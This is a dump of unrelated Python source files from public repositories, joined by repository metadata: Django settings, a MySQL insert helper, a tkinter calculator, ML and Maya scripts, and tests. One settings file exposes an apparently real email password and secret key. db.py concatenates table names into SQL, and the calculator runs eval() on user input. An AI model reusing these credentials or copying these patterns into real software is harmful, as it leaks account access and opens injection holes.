#writer.writeCdbIdFromName(self.dir+"pageIdFromName.cdb", testPages)
pageIntValue = CdbDictIntValue(self.dir + "pageIntValue.cdb")
# test _pack_value and _unpack_value
expected = 1234
result = pageIntValue._unpack_value(pageIntValue._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 'abcde'
result = pageIntValue._unpack_key(pageIntValue._pack_key(expected))
self.assertEqual(result, expected)
pageIntValue.clear()
pageIntValue.update(testPages)
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntValue[i]
self.assertEqual(result, expected)
return
pageIntValue['D'] = 1234
testPages['D'] = 1234
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntValue[i]
self.assertEqual(result, expected)
testPages['E'] = 1235
testPages['F'] = 1236
pageIntValue.update({'E': 1235, 'F': 1236})
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
print "bb", i
expected = testPages[i]['id']
result = pageIntValue[i]
self.assertEqual(result, expected)
self.assertTrue(False)
if __name__ == "__main__":
unittest.main()
|
[
"martinbudden@Martin-Buddens-MacBook-Pro-128.local"
] |
martinbudden@Martin-Buddens-MacBook-Pro-128.local
|
a5f438eda07a505719c1d571ca497d0f6d686280
|
fa12db8422b4a39c8fa3044936d75eba2637c5c0
|
/db.py
|
1162edbd0b51a04fcc5589bb1ddfc2cc9881f2bf
|
[] |
no_license
|
ericmeme321/stock
|
ac648186ffdf13a1e644c86e58735af6a6c7f585
|
057f45f870ee1e5013c9d86aeb4933f09810874b
|
refs/heads/main
| 2023-07-29T00:08:39.451252
| 2021-09-16T14:14:24
| 2021-09-16T14:14:24
| 403,338,993
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,018
|
py
|
import mysql.connector
from mysql.connector import Error
def DBinsert(stock_data, stock_name):
try:
# 連接 MySQL/MariaDB 資料庫
connection = mysql.connector.connect(
host='localhost', # 主機名稱
database='stock', # 資料庫名稱
user='root', # 帳號
password='') # 密碼
if connection.is_connected():
# 顯示資料庫版本
# db_Info = connection.get_server_info()
# print("資料庫版本:", db_Info)
# 顯示目前使用的資料庫
# cursor = connection.cursor()
# cursor.execute("SELECT DATABASE();")
# record = cursor.fetchone()
# print("目前使用的資料庫:", record)
stock_name = "tw_" + stock_name
cursor = connection.cursor()
if not stock_name in cursor:
cursor.execute("CREATE TABLE " + stock_name + " (uid INT(5) AUTO_INCREMENT PRIMARY KEY\
,date VARCHAR(10), open FLOAT(10), close FLOAT(10), high FLOAT(10), low FLOAT(10), vol INT(10)\
, rate VARCHAR(10));")
sql = "INSERT INTO "+ stock_name +" (date, open, close, high, low, vol, rate) VALUES (%s, %s, %s, %s, %s, %s, %s);"
for i in range(len(stock_data)):
row = stock_data.loc[i]
new_data = (str(row['日期']), str(row['開盤價']), str(row['收盤價']),
str(row['最高價']), str(row['最低價']), str(row['成交量']), str(row['漲跌幅']))
cursor.execute(sql, new_data)
# 確認資料有存入資料庫
connection.commit()
print("資料插入成功")
except Error as e:
print("資料庫連接失敗:", e)
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("資料庫連線已關閉")
return
|
[
"ericmeme321@gmail.com"
] |
ericmeme321@gmail.com
|
cb916fc056750611a6e62f2972d1bc514726e31f
|
9caf26afb3db3fab6e60a27db57e30e4b1decb58
|
/code/testmodel/多线程切换模型/thread-switch-model.py
|
6edcbaf3b8169b8533f759627d1a9734bf3486e1
|
[] |
no_license
|
xjy0508xjy/Maixpy
|
c584629805438fcf9906fdccfb568d3d4d072b92
|
c3efe97e9009d9f5d4f53ece1533c899d1a0e98a
|
refs/heads/master
| 2023-06-30T19:43:52.688414
| 2021-07-26T03:07:02
| 2021-07-26T03:07:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,556
|
py
|
import sensor,image,lcd,time
import KPU as kpu
import _thread
return_meg=['cheak']
WARNING={'cheak':'cheaking','unmask':'please mask','masks':'take off mask and waiting FACE cheak'}
def setsenor():
lcd.init(freq=15000000)
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.set_windowing((224, 224))
sensor.set_vflip(1)
sensor.run(1)
def loadmodel():
global return_meg
classes = ['unmask','masks']
status=0
task = kpu.load("/sd/mask2.kmodel")
anchor = (0.64, 0.67, 0.93, 0.97, 0.98, 1.06, 1.07, 1.17, 1.17, 1.3)
kpu.init_yolo2(task, 0.5, 0.3, 5, anchor)
while status==0:
img = sensor.snapshot()
code = kpu.run_yolo2(task, img)
status = 1 if code else 0
if code:
for i in code:
a=img.draw_rectangle(i.rect())
a = lcd.display(img)
for i in code:
lcd.draw_string(i.x(), i.y(), classes[i.classid()], lcd.RED, lcd.WHITE)
lcd.draw_string(i.x(), i.y()+12, '%.3f'%i.value(), lcd.RED, lcd.WHITE)
return_meg=[classes[i.classid()],'%.3f'%i.value()]
else:
lcd.display(img)
lcd.draw_string(50,10,'cheaking', lcd.RED,lcd.WHITE)
kpu.deinit(task)
def facemodel():
global return_meg
classes = ['people','nopeople']
status=0
task = kpu.load("/sd/face.kmodel")
anchors = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
kpu.init_yolo2(task, 0.5, 0.3, 5, anchors)
sensor.set_framesize(sensor.QVGA)
while True:
img = sensor.snapshot()
objects = kpu.run_yolo2(task, img)
status = 1 if objects else 0
if objects:
for i in objects:
a=img.draw_rectangle(i.rect())
a = lcd.display(img)
for i in objects:
lcd.draw_string(i.x(), i.y(), classes[i.classid()], lcd.RED, lcd.WHITE)
else:
lcd.display(img)
lcd.draw_string(50,10,'take off mask and waiting FACE cheak', lcd.RED,lcd.WHITE)
kpu.deinit(task)
if __name__ == "__main__":
_thread.start_new_thread(setsenor(),(0,))
_thread.start_new_thread(loadmodel(),(1,))
while True:
img = sensor.snapshot()
lcd.display(img)
lcd.draw_string(50,10, WARNING[return_meg[0]], lcd.RED,lcd.WHITE)
if return_meg[0] =='masks':
_thread.start_new_thread(facemodel(),(1,))
return_meg[0]='unmask'
|
[
"841891647@qq.com"
] |
841891647@qq.com
|
9ad3082f6beb7fe141b33b6a3a2165ebd2c6109d
|
14aad7b56c019f126d5d6d0581603d8e8ae8ae72
|
/god.works-v0.01.py
|
c8d3e2eb9a328bfab73919ba0124f8442f7e50f5
|
[] |
no_license
|
zombieleet/Open_Verse
|
6d1c9325ca52e458a699e8ddff03c519559ea32b
|
363031ac8ca7cf41fd394cd6c07ad0ed514aaeca
|
refs/heads/master
| 2020-12-24T10:33:09.520660
| 2015-08-05T17:32:03
| 2015-08-05T17:32:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,003
|
py
|
import tkinter as tk
calc = tk.Tk()
calc.title("God.Works")
FRONT_PAGE = ['OT','NT']
buttons = [
'OT', 'NT']
"""
, '9', '*', 'C',
'4', '5', '6', '/', 'Neg',
'1', '2', '3', '-', '$',
'0', '.', '=', '+', '@' ]
"""
# set up GUI
row = 1
col = 0
for i in buttons:
button_style = 'raised'
action = lambda x = i: click_event(x)
tk.Button(calc, text = i, width = 17, height = 17, relief = button_style, command = action) \
.grid(row = row, column = col, sticky = 'nesw')
col += 1
if col > 0: # if col > 4
col = 0
row += 1
display = tk.Entry(calc, width = 40, bg = "white")
display.grid(row = 0, column = 0, columnspan = 1) # columnspan = 5
def click_event(key):
# = -> calculate results
if key == '=':
# safeguard against integer division
if '/' in display.get() and '.' not in display.get():
display.insert(tk.END, ".0")
# attempt to evaluate results
try:
result = eval(display.get())
display.insert(tk.END, " = " + str(result))
except:
display.insert(tk.END, " Error, use only valid chars")
# C -> clear display
elif key == 'C':
display.delete(0, tk.END)
# $ -> clear display
elif key == '$':
display.delete(0, tk.END)
display.insert(tk.END, "$$$$C.$R.$E.$A.$M.$$$$")
# @ -> clear display
elif key == '@':
display.delete(0, tk.END)
display.insert(tk.END, "wwwwwwwwwwwwwwwwebsite")
# neg -> negate term
elif key == 'neg':
if '=' in display.get():
display.delete(0, tk.END)
try:
if display.get()[0] == '-':
display.delete(0)
else:
display.insert(0, '-')
except IndexError:
pass
# clear display and start new input
else:
if '=' in display.get():
display.delete(0, tk.END)
display.insert(tk.END, key)
# RUNTIME
calc.mainloop()
|
[
"kjphillips@suffolk.edu"
] |
kjphillips@suffolk.edu
|
3e1402dff571bf38b0da4764ff96cf356c407fcd
|
d1c86538a646bbf6b2d22a77b6de1325d13ae90f
|
/utils/temporal.py
|
cfe6d6ba385919241acfd9b85bb8f7998448c46b
|
[] |
no_license
|
xuecheng27/WWW21-Structural-Information
|
48904d0df34d9fcb069e709290d1e33c5fc76614
|
342d5880e522158b48219fe21a403abf5e8954e6
|
refs/heads/main
| 2023-02-20T21:33:13.123467
| 2021-01-23T11:00:46
| 2021-01-23T11:00:46
| 332,164,339
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,127
|
py
|
import pandas as pd
import numpy as np
def edgelist2snapshots(filepath, g):
"""Convert a edgelist with timestamps into g snapshots.
Arguments:
filepath (str): the filepath of the edgelist
g (int): the number of graph snapshots
"""
df = pd.read_csv(filepath, sep='\s+', header=None, names=['from', 'to', 'weight', 'timestamp'], dtype={'from':'str', 'to':'str', 'weight':np.float64, 'timestamp':int})
ecount = len(df.index)
start_time = df['timestamp'].min()
end_time = df['timestamp'].max()
interval = (end_time - start_time) / g
snapshots = dict()
for i in range(g):
snapshots[i] = []
dfs = df.sort_values(by=['timestamp'])
for i in range(ecount):
idx = np.floor((dfs.iloc[i]['timestamp'] - start_time) / interval)
if int(idx) == g:
snapshots[g - 1].append(i)
else:
snapshots[int(idx)].append(i)
filename = filepath.split('/')[1].split('.')[0]
for i in range(g):
dfs.iloc[snapshots[i]].to_csv(f'datasets/temporal-{filename}/{filename}-{i}.txt', sep=' ', header=False, index=False)
|
[
"51237370+xuecheng27@users.noreply.github.com"
] |
51237370+xuecheng27@users.noreply.github.com
|
f25b3a1838705336ae470c5e888b6d6e3172dd4a
|
f4244b1be1af8caa3d8848d679a2aa6d0b8fce2d
|
/NumberFun/ifPalindrome.py
|
408e0cf0cc6e727aad8829ad0a6620d5b71c540a
|
[] |
no_license
|
Sappadilla/NumberFun
|
ea4de65f80f7c6d70e6e659429b93f1db4e3f9f0
|
70010e97c7f9a86e83cc5e7f87e272c40cd3d8e9
|
refs/heads/master
| 2021-05-14T03:36:40.539911
| 2018-01-08T03:01:04
| 2018-01-08T03:01:04
| 116,621,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
#given input word, determine if it's a palindrome
def ifPalindrome(word):
if len(word) == 0: return True
if len(word) == 1: return True
else: return word[0] == word[-1] and ifPalindrome(word[1:-1])
def main():
#print(ifPalindrome("racecar"))
#print(ifPalindrome("tacocat"))
#print(ifPalindrome("taccccat"))
possible = ""
while possible != "exit":
possible = input("Put a word in to see if it's a Palindrome!\n")
print(ifPalindrome(possible))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
Sappadilla.noreply@github.com
|
57ccbe6a175d71c2d9c38ec16fbf63bc2a87951d
|
143186a58fa0d0395823eb2be7861155f147ced2
|
/Python_Interview_Questions/leetcode/tests/Q88_merge_sorted_array_test.py
|
2398d6b2374d832edc9402cc1f2e9527140e2ef9
|
[] |
no_license
|
MLgeek96/Interview-Preparation-Kit
|
04dbda8259d5faaa1298f11c741de32744912fc7
|
39bfa35f74455df07b93b6d4e2378a6f2e556528
|
refs/heads/master
| 2023-08-14T19:12:39.913505
| 2023-07-25T13:55:32
| 2023-07-25T13:55:32
| 260,638,941
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 434
|
py
|
import pytest
from leetcode.problem_sets.Q88_merge_sorted_array import merge
print(merge.__doc__)
def test_merge():
nums1 = [1,2,3,0,0,0]
m = 3
nums2 = [2,5,6]
n = 3
assert merge(nums1, m, nums2, n) == [1,2,2,3,5,6]
nums1 = [1]
m = 1
nums2 = []
n = 0
assert merge(nums1, m, nums2, n) == [1]
nums1 = [0]
m = 0
nums2 = [1]
n = 1
assert merge(nums1, m, nums2, n) == [1]
|
[
"jacson.chong@bigpayme.com"
] |
jacson.chong@bigpayme.com
|
c091495cb1882df88af2fa73b44c05f99998e8ca
|
1d2648f6d3ae227803c82fa4b7d505903a3f4daa
|
/uediadd/settings.py
|
e449ac620786e21751e20fff3652542e2aadb1fb
|
[] |
no_license
|
devcoder007/Uediadd
|
dc55977c7de2475ca786074657091739f88e4728
|
02e66faf4e27fa8b3b3b4acebe13eab4f1bd10ea
|
refs/heads/master
| 2022-06-03T03:07:10.550506
| 2020-01-22T21:49:45
| 2020-01-22T21:49:45
| 234,139,165
| 0
| 0
| null | 2022-05-25T03:01:57
| 2020-01-15T17:51:29
|
Python
|
UTF-8
|
Python
| false
| false
| 4,630
|
py
|
"""
Django settings for uediadd project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'template')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_e5di5fy-)10)8*2rrrqai6$ox#fu5cw+os4kjg2g3g7+#(&kr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# SESSION_COOKIE_SECURE = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'users',
'api',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django.contrib.sites',
'allauth',
'allauth.account',
'rest_auth.registration',
]
# ACCOUNT_AUTHENTICATION_METHOD = 'email'
# ACCOUNT_EMAIL_REQUIRED = True
# ACCOUNT_USERNAME_REQUIRED = False
# AUTHENTICATION_BACKENDS = (
# # Needed to login by username in Django admin, regardless of `allauth`
# "django.contrib.auth.backends.ModelBackend",
# # `allauth` specific authentication methods, such as login by e-mail
# "allauth.account.auth_backends.AuthenticationBackend",
# # "users.CustomObtainAuthToken",
# )
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'kampuskonnect.kk@gmail.com'
DEFAULT_FROM_EMAIL = 'kampuskonnect.kk@gmail.com'
EMAIL_HOST_PASSWORD = 'Rish@1996'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# REST_FRAMEWORK = {
# 'DEFAULT_AUTHENTICATION_CLASSES': (
# 'rest_framework.authentication.TokenAuthentication',
# ),
# 'DEFAULT_PERMISSION_CLASSES': (
# 'rest_framework.permissions.IsAuthenticated', )
# }
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
SITE_ID = 1
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
CORS_ORIGIN_WHITELIST = [
"https://example.com",
"https://sub.example.com",
"http://localhost:8080",
"http://127.0.0.1:9000",
"http://localhost:4200",
]
ROOT_URLCONF = 'uediadd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'uediadd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"rish@MacBook.local"
] |
rish@MacBook.local
|
ecdba4bb32ab0849dc1dc67fd70d841293255b5d
|
4348a28b5c8357c751bb81dfe5c2035cc72fbd6b
|
/Partido.py
|
ddd1c0c1f13af9c5c2541c1c17f0046262d37e71
|
[] |
no_license
|
Losajhonny/webscraping
|
9a91bb525c2f48c8cba76a40d0d2b835a1488d4f
|
7134fb39aa1d74786cd03d54c12d8c16984de0cc
|
refs/heads/master
| 2023-01-06T19:50:35.675755
| 2020-11-05T23:24:40
| 2020-11-05T23:24:40
| 298,959,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,435
|
py
|
class Partido:
yearIni = ''
yearFin = ''
jornadaNombre = ''
jornadaNumero = ''
fecha = ''
local_ta = ''
local_tr = ''
local_gl = ''
local = ''
visit_ta = ''
visit_tr = ''
visit_gl = ''
visit = ''
def toString(self):
return self.yearIni + ', ' + self.local + ' ' + self.local_gl + ' vs ' + self.visit_gl + ' ' + self.visit
def toStringLocal(self):
fechaFormat = self.fecha.split("/")
fechaString = fechaFormat[2] + "-" + fechaFormat[1] + "-" + fechaFormat[0]
cad = '"temporada": ' + self.yearIni + ', '
cad += '"yearIni": ' + self.yearIni + ', '
cad += '"yearFin": ' + self.yearFin + ', '
cad += '"nombreJornada": "' + self.jornadaNombre + '", '
cad += '"numeroJornada": ' + self.jornadaNumero + ', '
cad += '"fecha": (new Date("' + fechaString + '")).toISOString(), '
cad += '"juegoDe": "local", '
cad += '"equipo1": "' + self.local + '", '
cad += '"ta": ' + str(self.local_ta) + ', '
cad += '"tr": ' + str(self.local_tr) + ', '
cad += '"gf": ' + str(self.local_gl) + ', '
cad += '"equipo2": "' + self.visit + '", '
cad += '"gc": ' + str(self.visit_gl)
return cad
def toStringVisit(self):
fechaFormat = self.fecha.split("/")
fechaString = fechaFormat[2] + "-" + fechaFormat[1] + "-" + fechaFormat[0]
cad = '"temporada": ' + self.yearIni + ', '
cad += '"yearIni": ' + self.yearIni + ', '
cad += '"yearFin": ' + self.yearFin + ', '
cad += '"nombreJornada": "' + self.jornadaNombre + '", '
cad += '"numeroJornada": ' + self.jornadaNumero + ', '
cad += '"fecha": (new Date("' + fechaString + '")).toISOString(), '
cad += '"juegoDe": "visita", '
cad += '"equipo1": "' + self.visit + '", '
cad += '"ta": ' + str(self.visit_ta) + ', '
cad += '"tr": ' + str(self.visit_tr) + ', '
cad += '"gf": ' + str(self.visit_gl) + ', '
cad += '"equipo2": "' + self.local + '", '
cad += '"gc": ' + str(self.local_gl)
return cad
def toStringAll(self):
cad1 = self.toStringLocal()
cad2 = self.toStringVisit()
cad = 'db.partido.insert({ ' + cad1 + ' });\n'
cad += 'db.partido.insert({ ' + cad2 + ' });\n'
return cad
|
[
"2564550230101@ingenieria.usac.edu.gt"
] |
2564550230101@ingenieria.usac.edu.gt
|
2546bdab1e9803a59b26742dbc22ff1ef7476613
|
ad4244cbe9943027b794f0f4d974b1702413b0fd
|
/ShortSaleRatio_Windows.py
|
333cff60cb9eceefa2d46009041a40dadc8a5629
|
[] |
no_license
|
kkutsutani/ShortSaleRatio_Windows
|
9d32fdaf8f9fde0255b16b29cdcc9c040cfbb4bc
|
693a833221ab96e755cd9698dec41adfd0ae1cb6
|
refs/heads/main
| 2023-03-04T19:27:11.488833
| 2021-02-12T07:53:35
| 2021-02-12T07:53:35
| 338,244,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
import os
import xlrd
import pprint
flist = os.listdir(path='xls') # ディレクトリ(xls)の全ファイル名(パス含まず)のリストを返す
print( len(flist) ) # リストのサイズを返す
xlslist = [] # リストを定義
meigara = 9432 # ★銘柄番号
# 拡張子xls のファイルリスト作成
for fname in flist: # 現在パスの「全ファイル」によるループ
if fname.endswith('.xls'): # ファイル名の末尾(拡張子)が'xls'なら真
xlslist.append( fname ) # xlsファイル名をリストに追加
# 拡張子xls のファイルリスト作成
for fname in xlslist: # 現在パスの「全xlsファイル」によるループ
tmp_list = []
wb = xlrd.open_workbook( "xls/" + fname ) # xlsファイルのBookオブジェクトを取得
tmp_list.append( wb._sheet_names[0] ) # リストにシート名を追加
sheet = wb.sheet_by_name( wb._sheet_names[0] ) # 指定シートを取得
lineno = 8
hit = 0
value = 0
while lineno < sheet.nrows: # 最終行まで
cell = sheet.cell( lineno, 2 ) # セルを読む
if cell.ctype == 0: # セルが空白の場合
break # ループを抜ける
if cell.value == meigara: # セルが銘柄番号に該当?
hit = 1 # 該当銘柄があったフラグ
cell = sheet.cell( lineno, 10 ) # セルを読む
value += cell.value # 「空売り残高割合」を加算
lineno += 1 # 行+1
if hit == 1: # 該当銘柄があった場合
tmp_list.append( value * 100) # 「空売り残高割合」をリストに追加
print( tmp_list ) # 「空売り残高割合」を出力
|
[
"kkutsutani@oregano.ocn.ne.jp"
] |
kkutsutani@oregano.ocn.ne.jp
|
c1690f414026618d969eb3f83caaa9bcaa303ccc
|
c80bf22827ecf6cab725170f20a6cfe2d19e2d20
|
/exp3_DQN/maze_env.py
|
018a0f52e8df414e8ebfa7a03b87ad55acdf5888
|
[] |
no_license
|
Drawlone/RL
|
5753c9278c0df28e767c84a19bcdab9ebd56ea2a
|
06dd8494c54516a7edd72c711251637814e447d0
|
refs/heads/master
| 2022-07-03T00:40:16.349117
| 2020-05-19T04:49:58
| 2020-05-19T04:49:58
| 265,155,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,082
|
py
|
"""
Reinforcement learning maze example.
Red rectangle: explorer.
Black rectangles: hells [reward = -1].
Yellow bin circle: paradise [reward = +1].
All other states: ground [reward = 0].
This script is the environment part of this example.
The RL is in RL_brain.py.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
"""
import numpy as np
import time
import tkinter as tk
UNIT = 40 # pixels
MAZE_H = 4 # grid height
MAZE_W = 4 # grid width
class Maze(tk.Tk, object):
def __init__(self):
super(Maze, self).__init__()
self.action_space = ['u', 'd', 'l', 'r']
self.n_actions = len(self.action_space)
self.n_features = 2
self.title('maze')
self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))
self._build_maze()
def _build_maze(self):
self.canvas = tk.Canvas(self, bg='white',
height=MAZE_H * UNIT,
width=MAZE_W * UNIT)
# create grids
for c in range(0, MAZE_W * UNIT, UNIT):
x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT
self.canvas.create_line(x0, y0, x1, y1)
for r in range(0, MAZE_H * UNIT, UNIT):
x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r
self.canvas.create_line(x0, y0, x1, y1)
# create origin
origin = np.array([20, 20])
# hell
hell1_center = origin + np.array([UNIT * 2, UNIT])
self.hell1 = self.canvas.create_rectangle(
hell1_center[0] - 15, hell1_center[1] - 15,
hell1_center[0] + 15, hell1_center[1] + 15,
fill='black')
# hell
# hell2_center = origin + np.array([UNIT, UNIT * 2])
# self.hell2 = self.canvas.create_rectangle(
# hell2_center[0] - 15, hell2_center[1] - 15,
# hell2_center[0] + 15, hell2_center[1] + 15,
# fill='black')
# create oval
oval_center = origin + UNIT * 2
self.oval = self.canvas.create_oval(
oval_center[0] - 15, oval_center[1] - 15,
oval_center[0] + 15, oval_center[1] + 15,
fill='yellow')
# create red rect
self.rect = self.canvas.create_rectangle(
origin[0] - 15, origin[1] - 15,
origin[0] + 15, origin[1] + 15,
fill='red')
# pack all
self.canvas.pack()
def reset(self):
self.update()
time.sleep(0.1)
self.canvas.delete(self.rect)
origin = np.array([20, 20])
self.rect = self.canvas.create_rectangle(
origin[0] - 15, origin[1] - 15,
origin[0] + 15, origin[1] + 15,
fill='red')
# return observation
return (np.array(self.canvas.coords(self.rect)[:2]) - np.array(self.canvas.coords(self.oval)[:2]))/(MAZE_H*UNIT)
def step(self, action):
s = self.canvas.coords(self.rect)
base_action = np.array([0, 0])
if action == 0: # up
if s[1] > UNIT:
base_action[1] -= UNIT
elif action == 1: # down
if s[1] < (MAZE_H - 1) * UNIT:
base_action[1] += UNIT
elif action == 2: # right
if s[0] < (MAZE_W - 1) * UNIT:
base_action[0] += UNIT
elif action == 3: # left
if s[0] > UNIT:
base_action[0] -= UNIT
self.canvas.move(self.rect, base_action[0], base_action[1]) # move agent
next_coords = self.canvas.coords(self.rect) # next state
# reward function
if next_coords == self.canvas.coords(self.oval):
reward = 1
done = True
elif next_coords in [self.canvas.coords(self.hell1)]:
reward = -1
done = True
else:
reward = 0
done = False
s_ = (np.array(next_coords[:2]) - np.array(self.canvas.coords(self.oval)[:2]))/(MAZE_H*UNIT)
return s_, reward, done
def render(self):
# time.sleep(0.01)
self.update()
|
[
"1419076398@qq.com"
] |
1419076398@qq.com
|
d6b7953295e0c4a5bb26ea5f6f41ed972a6a132b
|
7b475586d089f7da385bf125c2e3eb135e04edb7
|
/petfactory/modelling/curves/get_positions_on_circle_perimeter.py
|
9938c10361390a70adcd4cbf5d4eb09a2e4f0923
|
[] |
no_license
|
EriLee/petfactory_maya_scripts
|
e3085654f36fcb56b95601b4f801da9d4d990a8a
|
ba002212d61c94e87579fdbc5968282713b895b6
|
refs/heads/master
| 2021-01-18T08:00:47.123047
| 2015-03-30T08:10:35
| 2015-03-30T08:10:35
| 33,191,651
| 2
| 2
| null | 2015-03-31T14:57:41
| 2015-03-31T14:57:41
| null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
import pymel.core as pm
import math
def loc(x,y,z=0):
loc = pm.spaceLocator()
loc.translate.set((x,y,z))
loc.getShape().localScale.set(.05, .05, .05)
# the hypoytenuse
crv = pm.PyNode('crv')
pos_list = crv.getCVs()
r = 1.0
circ_center = pm.datatypes.Vector(2,1,0)
mid_vec = pos_list[1] - pos_list[0]
#The angle of the mid vector, i.e. the shared hypotenuse
theta = math.atan2(pos_list[1].y, pos_list[1].x)
#print(pm.util.degrees(theta))
# the angle we need to rpotate from positive x axis to the theta angle
ang = math.pi + theta
#ang_deg = pm.util.degrees(ang)
# the angle between theta and the oposite side of the right triangle (1.5 PI)
dif_ang = math.pi*1.5 - ang
num_points = 5
ang_inc = dif_ang / (num_points+1)
for i in range(num_points):
#dif_ang_half = dif_ang * .5
rot = ang + ang_inc * (i+1)
rot_deg = pm.util.degrees(rot)
#line = pm.curve(d=1, p=[(0,0,0), (2,0,0)])
#line.translate.set(2,1,0)
#line.rotate.set(0,0,rot_deg)
x = (math.cos(rot)) + circ_center.x
y = (math.sin(rot)) + circ_center.y
pos = pm.datatypes.Vector(x,y,0)
loc(pos.x, pos.y, pos.z)
# reflect around the mid vec
reflect_pos = 2 * pos.dot(mid_vec) / mid_vec.dot(mid_vec) * mid_vec - pos
loc(reflect_pos.x, reflect_pos.y, reflect_pos.z)
|
[
"johan@Johans-Mac-Pro.local"
] |
johan@Johans-Mac-Pro.local
|
90543404593bfada9faff01457b9d19d4ec39de2
|
812b5bb1110d1853ef6978c93fc88b7ae53a0813
|
/aquaara/settings.py
|
d902773b8b1c77bb88487af504e2466552ae2461
|
[] |
no_license
|
SamuelSilvaAraujo/aquaara
|
841ff1350c04c700c068be4bb885764fe8a4fdc6
|
8f84464c0bfd050e61fa3e2827b7747b58ab81ec
|
refs/heads/master
| 2022-12-27T08:50:46.153919
| 2020-10-10T01:15:18
| 2020-10-10T01:15:18
| 302,781,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,482
|
py
|
"""
Django settings for aquaara project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ull0(&j9=w37aioq+)@yzd80^yyh$3-mo11b5oy&8f+f%%1-e!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
